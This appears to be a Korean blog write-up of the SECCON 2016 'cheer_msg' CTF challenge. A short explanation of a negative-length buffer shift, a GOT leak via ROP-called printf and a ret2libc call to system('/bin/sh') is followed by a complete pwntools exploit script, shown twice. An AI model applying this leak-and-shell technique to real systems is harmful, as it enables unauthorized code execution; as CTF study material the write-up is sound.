2016 seccon cheer

pwnablekr의 alloca랑 비슷한 문제였다.

값을 음수로 주게되면 입력buf의 주소를 조절할 수 있다.

rop로 printf("~~%s~~%s~~~", got, got) 호출해서 got를 릭한다음

libc주어졌으니 실제주소구하고

printf 호출 뒤 다시 main으로 트리거해서 system("/bin/sh") 호출되게했다.

  
from pwn import *
 
local = False
if local :
    s = process('./cheer_msg')
    print util.proc.pidof(s)
    pause()
else :
    s = remote('cheermsg.pwn.seccon.jp', 30527)
 
elf = ELF('cheer_msg')
libc = ELF('libc')
 
pop3ret = 0x80487ad
 
def solver() :
    s.recvuntil('>>')
    s.sendline('-128')  #input buf -> main ebp-12
    s.recvuntil('>>')
    pay = 'a' * 16
    pay += p32(elf.plt['printf']) + p32(pop3ret)
    pay += p32(0x804887D) + p32(elf.got['atoi']) * 2
    pay += p32(0x80485CA)
    s.sendline(pay)
 
    #calculate addr
    leak = s.recvuntil('Message Length').split()
    atoi_addr = u32(leak[25])
 
    offset = atoi_addr - libc.symbols['atoi']
    system = offset + libc.symbols['system']
    binsh = offset + list(libc.search('/bin/sh'))[0]
 
    #main trigger
    s.recvuntil('>>')
    s.sendline('-128')
    s.recvuntil('>>')
    pay = 'a' * 16
    pay += p32(system)
    pay += 'aaaa'
    pay += p32(binsh)
    s.sendline(pay)
 
    s.interactive()
 
if __name__ == '__main__' :
    solver()

저작자표시 비영리 변경금지 (새창열림)

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

티스토리툴바

개인정보

단축키

내 블로그

블로그 게시글

모든 영역


	from pwn import *

	local = False
	if local :
	s = process('./cheer_msg')
	print util.proc.pidof(s)
	pause()
	else :
	s = remote('cheermsg.pwn.seccon.jp', 30527)

	elf = ELF('cheer_msg')
	libc = ELF('libc')

	pop3ret = 0x80487ad

	def solver() :
	s.recvuntil('>>')
	s.sendline('-128') #input buf -> main ebp-12
	s.recvuntil('>>')
	pay = 'a' * 16
	pay += p32(elf.plt['printf']) + p32(pop3ret)
	pay += p32(0x804887D) + p32(elf.got['atoi']) * 2
	pay += p32(0x80485CA)
	s.sendline(pay)

	#calculate addr
	leak = s.recvuntil('Message Length').split()
	atoi_addr = u32(leak[25])

	offset = atoi_addr - libc.symbols['atoi']
	system = offset + libc.symbols['system']
	binsh = offset + list(libc.search('/bin/sh'))[0]

	#main trigger
	s.recvuntil('>>')
	s.sendline('-128')
	s.recvuntil('>>')
	pay = 'a' * 16
	pay += p32(system)
	pay += 'aaaa'
	pay += p32(binsh)
	s.sendline(pay)

	s.interactive()

	if __name__ == '__main__' :
	solver()

블로그의 정보

활동하기

공유하기

다른 글

티스토리툴바

개인정보

단축키

내 블로그

블로그 게시글

모든 영역